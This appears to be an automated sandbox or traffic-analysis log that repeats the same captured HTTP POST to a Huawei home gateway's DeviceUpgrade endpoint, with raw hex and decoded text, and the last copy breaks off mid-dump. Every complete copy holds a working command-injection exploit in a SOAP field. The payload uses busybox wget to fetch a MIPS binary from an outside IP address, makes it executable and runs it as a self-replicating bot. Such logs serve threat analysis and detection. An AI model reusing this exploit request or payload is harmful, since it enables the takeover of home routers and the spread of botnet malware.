          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 